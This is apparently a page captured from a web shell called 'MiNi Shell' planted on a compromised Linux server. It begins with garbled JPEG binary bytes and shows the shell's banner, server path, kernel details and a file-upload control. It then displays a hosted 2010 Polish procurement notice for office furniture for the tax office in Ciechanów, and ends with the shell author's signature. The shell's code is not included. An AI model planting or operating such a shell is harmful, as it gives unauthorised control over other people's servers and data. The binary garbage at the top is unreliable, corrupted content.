JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101015/289683-N-2010.html

<p class="kh_header"><b>Ciechanów: Dostawa foteli gabinetowych, sof i krzeseł pracowniczych dla Urzędu Skarbowego w Ciechanowie</b><br>
<b>Numer ogłoszenia: 289683 - 2010; data zamieszczenia: 15.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w  Ciechanowie , ul. Warszawska 58, 06-400 Ciechanów, woj. mazowieckie, tel. 023 6723538, 6724439 w. 221, faks 023 6723538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.is.waw.pl/usciechanow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa foteli gabinetowych, sof i krzeseł pracowniczych dla Urzędu Skarbowego w Ciechanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  dostawa  foteli gabinetowych, sof i  krzeseł pracowniczych dla Urzędu Skarbowego w Ciechanowie.
Sofa dyrektorska 2-osobowa - szt. 1
Siedzisko- Tapicerowane tkaniną. Konstrukcja nośna wykonana  z drewna i płyt wiórowych obita pianką. W siedzisku sprężyny.Głębokość siedziska - 520 mm. 
Oparcie- Konstrukcja nośna wykonana  z drewna i płyt wiórowych obita pianką. Wysokość oparcia (od siedziska) - 400 mm. Siedzisko  i oparcie tapicerowane tkaniną o wysokiej jakości w kolorze zielonej oliwki z katalogu Bejot  Aquarius   IV grupa cenowa JA 445 - wełna 100%, ciężar  370g na m2 ? 5%,  odporność na ścieranie 50000 cykli Martindale (B5 5690), odporność na pilling 4,5   ISO 105-X12, atest trudnozapalności ( BS EN 1021-1,  BS  EN 1021-2)  lub równoważną  do uzgodnienia z Zamawiającym. Podstawa - Konstrukcja, nóżki wykonane z płaskownika  ze stali nierdzewnej. 
Wymiary: szerokość całkowita1420 mm, szerokość wew. siedziska 1180mm, głębokość całkowita 825mm, wysokość całkowita 780mm.
Sofa 2 - osobowa -  1 szt.
Siedzisko: Miękkie, tapicerowane tkaniną  w kolorze fioletowym z katalogu Nowy Styl  Contract YN 204 - 100% poliester, ścieralność 100.000 cykli Martindale,  niepalność:  papieros (EN 1021.1, zapałka EN 1021.2) lub równoważną  do uzgodnienia z Zamawiającym. Konstrukcja nośna  wykonana z drewna i płyt wiórowych obita pianką. Oparcie i podłokietniki stanowiące jedną całość (jeden element) 
Miękkie, tapicerowane tkaniną w kolorze jasno szarym z katalogu Nowy Styl  Contract YN 108 -    - 100% poliester, ścieralność 100.000 cykli Martindale,  niepalność:  papieros (EN 1021.1, zapałka EN 1021.2) lub równoważną do uzgodnienia z Zamawiającym. 
Podstawa/nóżki: metalowe, chromowane.Nóżki sofy wykonane  wyposażone w stopki samopoziomujące. Nóżki rozchylające się lekko ku dołowi. Oparcie i podłokietniki stanowią jedną całość. Ku przodowi podłokietniki lekko ścięte poniżej wysokości oparcia, zaokrąglone. 
Wymiary: całkowita wysokość: 765 mm, całkowita szerokość 1040 mm, całkowita głębokość 585 mm, wysokość siedziska: 470 mm , głębokość siedziska: 450 mm, szerokość siedziska: 1000 mm , szerokość podstawy: 1040 mm długość podstawy: 585 mm 
Fotel  obrotowy dyrektorski -  2 szt.
 Oparcie:Miękkie, tapicerowane, wysokość oparcia z przodu od poziomu siedziska - 800 mm. Podłokietniki wraz z oparciem stanowią jeden element. Oparcie lekko zwężane ku górze.
Wyposażone w mechaniczną poduszkę lędźwiową BLS mocowaną pod tapicerką.
 Siedzisko: Wykonane na bazie formatki sklejkowej. Tapicerowane tkaniną .
Przód siedziska wyraźnie zaokrąglony w dół. wystaje poza obręb podłokietników.
Siedzisko wyposażone w mechanizm regulujący jego głębokość.
Głębokość siedziska - 490 mm - 540 mm. Szerokość siedziska - 490 mm
Zagłówek:Stanowi osobny tapicerowany w całości element wyposażony w system regulacji wysokości, przy zastosowaniu mechanizmu zapadkowego.
Siedzisko, oparcie  i zagłówek w kolorze zielonej oliwki (rodzaj tkaniny i kolor identyczny jak sofa dyrektorska 2-osobowa), z katalogu Bejot  Aquarius   IV grupa cenowa JA 445 - wełna 100%, ciężar  370g na m2 ? 5%,  odporność na ścieranie 50000 cykli Martindale (B5 5690), odporność na pilling 4,5  atest trudnozapalności (EN 1021-1,   EN 1021-2)  lub równoważną  do uzgodnienia z Zamawiającym.
 Mechanizmy:T+X - mechanizm synchro z możliwością regulacji głębokości siedziska oraz kąta pochylenia siedziska i oparcia G - mechanizm synchro z regulacją głębokości siedziska, trzystopniową regulacją kąta ustawienia siedziska oraz szybką regulacją siły nacisku na oparcie w bardzo dużym zakresie obciążenia.
VMS- ORTHOPEDIC LINE -mechanizm umożliwiający płynne wychylenia fotela we wszystkich płaszczyznach, w tym na boki.
Podstawa:18 - krzyżak o średnicy 680 mm, ramię aluminium polerowane,wspornik grafit 
Kółka przeznaczone na twarde podłoże, z  hamulcem .
Wymiary: szerokość całkowita 640mm, głębokość całkowita 670mm, wysokość całkowita1250mm-1340mm, wysokość do siedziska 450mm-540mm.
Fotelik konferencyjny - 8 szt.
Oparcie: Miękkie, tapicerowane tkaniną w kolorze zielonej oliwki. Podłokietniki wraz z oparciem stanowią jeden element. Wysokość oparcia z przodu od poziomu siedziska - 470 mm
Siedzisko: Tapicerowane tkaniną w kolorze zielonej oliwki. Przód siedziska jest wyraźnie zaokrąglony w dół. Wykracza poza obręb podłokietników .Głębokość siedziska - 470 mm.  Szerokość siedziska - 490 mm.
Siedzisko, oparcie i podłokietniki   w kolorze zielonej oliwki (rodzaj tkaniny i kolor identyczny jak sofa dyrektorska 2-osobowa i fotel obrotowy dyrektorski), z katalogu Bejot  Aquarius   IV grupa cenowa JA 445 - wełna 100%, ciężar  370g na m2 ? 5%,  odporność na ścieranie 50000 cykli Martindale (B5 5690), odporność na pilling 4,5  atest trudnozapalności (EN 1021-1,   EN 1021-2)  lub równoważną  do uzgodnienia z Zamawiającym. Stelaż, nóżki -chromowe, stopki filcowe na twarde podłoże. Wymiary: szerokość całkowita 595mm, głębokość całkowita 650 mm, wysokość całkowita 870 mm,  wysokość do siedziska 460 mm.
Krzesło  obrotowe pracownicze - 1 szt.
Siedzisko i oparcie miękkie tapicerowane tkaniną w kolorze fiolet  z katalogu Nowy Styl  Contract YN 204 - 100% poliester, ścieralność 100.000 cykli Martindale,  niepalność:  papieros (EN 1021.1, zapałka EN 1021.2) lub równoważną do uzgodnienia z Zamawiającym.  Szerokie siedzisko, ergonomicznie wyprofilowane oparcie, płynnie regulowany zagłówek w kolorze oparcia i siedziska, regulowana wysokość oparcia i podparcia lędźwi,  regulowana wysokość siedziska. 
Podłokietniki wykonane z tworzywa sztucznego w kształcie lit .T, pełne. 
Podstawa 5- ramienny krzyżak z tworzywa sztucznego z samohamownymi kółkami do powierzchni twardych. Wymiary szerokość siedziska: 510mm, głębokość siedziska 450mm
Krzesło obrotowe pracownicze - 17 szt. Siedzisko i oparcie miękkie tapicerowane tkaniną podstawową z katalogu Nowy Styl C-4 - 100% włókno syntetyczne, ścieralność 30000 cykli Martindale lub równoważną do uzgodnienia z Zamawiającym. Możliwość odchylania i blokady oparcia w wybranej pozycji. Płynnie regulowana wysokość siedziska. Regulowana głębokość siedziska. Nowoczesne, wygodne podłokietnik z tworzywa sztucznego. Regulowana wysokość oparcia. Stabilna, metalowa podstawa jezdna    z  nakładkami z plastiku.
Wymiary: wysokość fotela  945 mm- 1135 mm wysokość siedziska  415 mm - 545 mm
głębokość siedziska  395- 420 mm szerokość siedziska 550 mm.
Krzesło stacjonarne bez podłokietników - 16 szt. 
Stelaż siedziska z profilu stalowego o przekroju płasko - owalnym (wymiary przekroju 30x 15x1,5mm) na czterech nogach,  Rura ma jednakowy kształt i przekrój na całej swojej długości (brak przewężeń w miejscach gięcia). 
Siedzisko i oparcie wykonane ze sklejki, pokryte pianką zapobiegającej odkształceniom.
-  4 sztuki  krzeseł tapicerowane tkaniną z katalogu Nowy Styl C-14  - 100% włókno syntetyczne, ścieralność 30000 cykli Martindale lub równoważną do uzgodnienia z Zamawiającym,
- 12 sztuk krzeseł tapicerowanych tkaniną z katalogu Nowy Styl C- 4  - 100% włókno syntetyczne, ścieralność 30000 cykli Martindale lub równoważną do uzgodnienia z Zamawiającym,
Stelaż w kolorze chrom.Konstrukcja umożliwiająca sztaplowanie krzeseł.    
Wymiary krzesła:wysokość całkowita - 850 mm, wysokość siedziska - 480 mm, szerokość całkowita - 540 mm.
- Zaoferowane przez Wykonawcę  fotele gabinetowe, sofy i  krzesła pracownicze muszą być fabrycznie nowe, pełnowartościowe  i w pierwszym gatunku, a także spełniać parametry techniczne i jakościowe wymagane przez Zamawiającego.
- Kolor tapicerki każdego asortymentu do uzgodnienia z Zamawiającym. 
- Dopuszcza się odchylenie od podanych parametrów dot. wysokości, szerokości i głębokości  siedzisk w granicach ?  5%.
- Materiały użyte do wykonania foteli gabinetowych, sof i  krzeseł pracowniczych winny posiadać odpowiednie, określone przepisami  normami atesty bezpieczeństwa i higieny pracy.
- Użyty materiał nie może zmieniać struktury i koloru pod wpływem ciepła i wody.
- Wykonawca zobowiązany jest dostarczyć fotele gabinetowe, sofy i  krzesła pracownicze   do siedziby Zamawiającego na własny koszt, ewentualny montaż odbywa się przez Wykonawcę przy użyciu  narzędzi należących do Wykonawcy oraz ustawienia w miejscach wskazanych przez Zamawiającego.
- Zamawiający zastrzega sobie prawo zwrócenia się do Wykonawcy, w toku badania ofert,  o zaprezentowanie oferowanych foteli gabinetowych, sof i  krzeseł pracowniczych w miejscu uzgodnionym przez Wykonawcę   z Zamawiającym.
- Oferowane fotele gabinetowe, sofy i  krzesła pracownicze muszą być objęte co najmniej 24 miesięczną gwarancją jakości, okres gwarancyjny liczony będzie od daty protokołu odbioru towaru, dotyczącego całości przedmiotu umowy.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr  1 do specyfikacji istotnych warunków zamówienia zwaną dalej SIWZ.
Wymienione w jakiejkolwiek części opisu przedmiotu zamówienia nazwy, marki wyrobów, nie są obligatoryjne dla Wykonawców. Wykonawca ma prawo do zaoferowania innych wyrobów pod warunkiem zapewnienia parametrów technicznych, co najmniej identycznych z parametrami wyrobów wymienionymi w SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.11.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek Zamawiający uzna Wykonawców, którzy posiadają doświadczenie zawodowe, tzn. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej dwie dostawy krzeseł biurowych o wartości nie  niższej  niż  10.000 zł brutto każda dostawa.
Ocena spełniania warunków  udziału w postępowaniu  zostanie dokonana wg formuły:  spełnia - nie spełnia. Z treści złożonych dokumentów musi wynikać jednoznacznie,  iż przedstawiony warunek Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Zestawienie ilościowo - cenowe oferowanych  foteli gabinetowych, sof i  krzeseł pracowniczych dla Urzędu Skarbowego w Ciechanowie według wzoru stanowiącego załącznik nr 8 do SIWZ;
2. Atesty bezpieczeństwa i higieny pracy materiałów użytych do wykonania oferowanych  foteli gabinetowych, sof i  krzeseł pracowniczych;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający w trakcie realizacji umowy dopuszcza w każdym czasie zmianę jej treści, jeżeli dotyczyć to będzie:
- nieistotnych elementów, które nie były treścią oferty i kryterium jej oceny,
- nie mające wpływu na krąg podmiotów ubiegających się o udzielenie zamówienia,
- nie mających wpływu na końcowy wynik postępowania.
Zamawiający zgodnie z dyspozycją art. 144 ust. 1 Ustawy dopuszcza:
- zmianę wysokości wynagrodzenia Wykonawcy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku zmiany powszechnie obowiązujących przepisów ustawy o podatku od towarów i usług. Zmiana wysokości wynagrodzenia Wykonawcy nastąpi w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.is.waw.pl/usciechanow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Ciechanowie ul. Warszawska 58, 06 - 400 Ciechanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2010 godzina 10:00, miejsce: Siedziba Urzędu Skarbowego w Ciechanowie ul. Warszawska  58  w pok. nr 304  w godzinach 730-1530 lub przesłać pocztą na adres Urzędu Skarbowego w Ciechanowie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com